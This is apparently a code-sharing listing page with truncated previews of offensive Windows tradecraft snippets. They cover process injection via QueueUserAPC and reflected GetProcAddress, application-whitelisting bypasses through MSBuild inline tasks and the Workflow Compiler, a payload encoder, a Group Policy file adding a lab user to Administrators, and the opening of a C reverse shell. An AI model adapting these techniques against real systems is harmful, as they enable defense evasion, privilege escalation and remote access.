This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe" | |
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe) | |
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper',[Reflection.BindingFlags] 'NonPublic, Static') | |
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll' | |
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters | |
$compilerparam.GenerateInMemory = $True | |
$pathvar = "C:\Users\Public\test.txt" | |
$output = "run.xml" | |
$tmp = $SerializeInputToWrapper.Invoke($null,@([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam,[String[]] @(,$pathvar))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$payload = "hi mom" | |
[string]$output = "" | |
$payload.ToCharArray() | %{ | |
[string]$thischar = [byte][char]$_ + 17 | |
if($thischar.Length -eq 1) | |
{ | |
$thischar = [string]"00" + $thischar | |
$output += $thischar | |
} | |
elseif($thischar.Length -eq 2) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function LookupFunc { | |
Param ($moduleName, $functionName) | |
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | ? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
$tmp=@() | |
$assem.GetMethods() | % {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} | |
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) | |
} | |
function getDelegateType { | |
Param ( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="0xtaco"> | |
<Brax /> | |
</Target> | |
<UsingTask | |
TaskName="Brax" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
<Code Type="Class" Language="cs"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"bufio" | |
"bytes" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AppLocker Bypass Checker (Default Rules) v2.0 | |
# | |
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed. | |
# A normal user shouln't have write permission in that folder, but that is not always the case. | |
# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations | |
# | |
# @Author: Sparc Flow in "How to Hack a Fashion Brand" | |
# | |
# NOTE: change the group and root_folder variables to suit your needs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group> | |
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */ | |
#include <winsock2.h> | |
#include <stdio.h> | |
#pragma comment(lib, "w2_32") | |
WSADATA wsaData; | |
SOCKET Winsock; | |
SOCKET Sock; |
NewerOlder